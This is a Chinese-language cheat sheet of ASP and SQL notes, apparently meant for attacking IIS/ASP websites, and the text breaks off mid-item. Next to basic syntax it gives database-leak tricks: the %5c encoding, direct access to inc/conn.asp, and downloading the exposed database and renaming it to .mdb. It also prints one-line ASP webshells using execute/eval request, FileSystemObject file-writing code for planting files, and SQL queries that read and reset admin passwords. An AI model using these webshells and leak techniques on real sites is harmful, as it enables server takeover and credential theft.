asp代码要放在“<%”“%>”符号中间,所有包含在符号中间的代码被IIS解释执行,IIS执行后把执行的结果发给浏览器。
Response.Write“”把引号里面的内容输出到浏览器上。
Response.Redirect“”重新定向到引号里面的页面。
Dim:asp中用来定义变量的方式,定义多个变量是中间用逗号隔开。
Server.MapPath:把相对路径转换为物理路径。
%5c:为“\”进行URL编码后的表达方式,可进行暴库。
inc/conn.asp:可直接访问暴库。
暴库时仅仅显示http500错误时,将“显示友好的http错误信息”去掉。
暴出的数据库是.asp的文件时,将数据库地址填到下载工具中进行下载,将数据库改为.mdb格式打开。
数据库中含有“#”之类的特殊符号时,使用对应的URL编码代替数据库文件中的特殊符号,如“#”对应的是“%23”。
典型的一句话服务端代码:<%execute request(“密码”)%>
海洋顶端eval版一句话木马服务端代码:<%eval request(“密码”)%>
使用Server.CreateObject建立一个FileSystemObject的对象:<%set fso对象名=Server.CreateObject(”Scripting.FileSystemObject”)%>
使用fso对象的CreateTextFile函数建立一个文本文件:
<%Set FILE=fso对象.CreateTextFile(filename,True)%>
FILE:指向刚刚创建的文件,可以通过它对文件进行读写操作。
Filename:要创建的文件的路径。
TRUE:若文件存在则覆盖文件,否则不覆盖文件。
通过创建的file的write函数向文件写入指定数据:FILE.write(string)
写入数据完毕,使用close函数关闭文件,释放资源:FILE.close
SQL语句
1.Select 字段名 from 数据表:
Select * from admin(将admin表中的所有字段取出)
Select username from admin(将admin表中username字段取出)
Select top 5 * from admin(将admin表中前五条记录的所有字段取出)
2.Select 字段名 from 数据表 where 筛选条件:
Select password from admin where username=’XX’(把用户名为XX的密码选出来)
Select password from admin where username=’XX’ and id=1(把用户名为XX且id为1的密码选出来)
Select * from admin where id between 1 and 10(把id在1和10指尖的所有字段取出来)
3.delete from 数据表 where 条件:
delete from admin where username=’XX’(删除用户名为XX的记录,如果没有where的限制,则将删除所有记录)
4.update 数据表 set 字段名=新值 where 条件:
Update admin set password=’123456’ where username=’XX’(更新admin数据表中用户名为XX的用户密码为123456)
5.insert into 数据表 values(字段新值)
Insert into 数据表(字段1,2,……) values(字段新值)
当VALUES()中含有数据表的所有字段时,可以省略“数据表”后面的“(字段1,2,……)”:
Insert into admin
(id,username,password) values(2,’XX’,’123456’)
向admin数据表中插入一条ID为2,用户名为XX,密码为123456的新纪录。
字符串都必须使用单引号引起来,数字型的值则可以不用。
6.Create database 数据库名称
此时数据库名称在服务器上是唯一的:
Create database XX(建立一个名为XX的数据库)
7.create table 数据表(字段名 数据类型,字段名 数据类型,……):
Create table tmp(tmp text)(建立一个名为tmp的数据表,表中包含一个名为tmp,数据类型为text的字段)
8.Select 字段名 from数据表 group by 用来分组的字段名 having 分组的字段名=内容:
Select * from class group by 性别 having=’男’(选出数据表为class中性别分组中的性别为男的一组数据)
基础函数:
1.count(*)(算出返回记录的函数):
Select count(*) from admin(返回admin表中所有记录的行数)
2.access:asc(字符)
SQL Server:unicode(字符)
asc(’#’)=35(#的ascii码值为35)
3.access